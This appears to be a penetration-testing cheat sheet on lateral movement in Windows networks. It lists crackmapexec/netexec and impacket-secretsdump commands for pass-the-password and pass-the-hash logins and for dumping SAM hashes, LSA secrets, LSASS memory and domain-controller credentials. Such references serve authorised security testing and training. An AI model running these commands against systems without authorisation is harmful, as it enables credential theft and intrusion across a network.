If we crack a password and/or can dump the SAM (Security Accounts Manager) hashes, we can leverage either one for lateral movement within the network.
crackmapexec/netexec:
Pass the Password
crackmapexec smb <ip/CIDR> -u <user> -d <domain> -p <password> {Authenticate to a remote SMB server using the provided password}
Pass the hash (NTLMv1 Hash)
crackmapexec smb <ip/CIDR> -u <user> -H <hash> --local-auth {Authenticate to the target system using the user's password hash instead of the cleartext password}
crackmapexec smb <ip/CIDR> -u <user> -H <hash> --local-auth --sam {Dump the SAM hashes from the target system directly}
crackmapexec smb <ip/CIDR> -u <user> -H <hash> --local-auth --shares {Enumerate the available SMB shares on the target system}
crackmapexec smb <ip/CIDR> -u <user> -H <hash> --local-auth --lsa {Dump the Local Security Authority (LSA) secrets from the target system}
crackmapexec smb -L {List all built-in modules}
crackmapexec smb <ip/CIDR> -u <user> -H <hash> --local-auth -M lsassy {Dump credentials from LSASS (Local Security Authority Subsystem Service) memory on the target system using the lsassy module}
--local-auth: Authenticate with the provided credentials as a local account on the target machine, rather than as domain credentials.
The CME DB: Stores the various pieces of information collected during penetration testing activities. It helps organize data gathered from SMB shares, network enumeration, credential validation, and other reconnaissance activities.
Metasploit: Grab some local hashes
secretsdump: Grab some local hashes. Dumps the hashes stored in the SAM database and the LSA secrets.
secretsdump.py / impacket-secretsdump:
impacket-secretsdump <domain>/<user>:<password>@<user-ip> {Authenticate with a password and dump the SAM and LSA secrets of a workstation}
impacket-secretsdump <domain>/<domain-admin>:<password>@<domain-controller-ip> {Run as a domain admin against a domain controller to dump domain credentials}
impacket-secretsdump <user>:@<user-ip> -hashes <hash> {Authenticate with the hash instead of a password; -hashes takes the LMHASH:NTHASH form}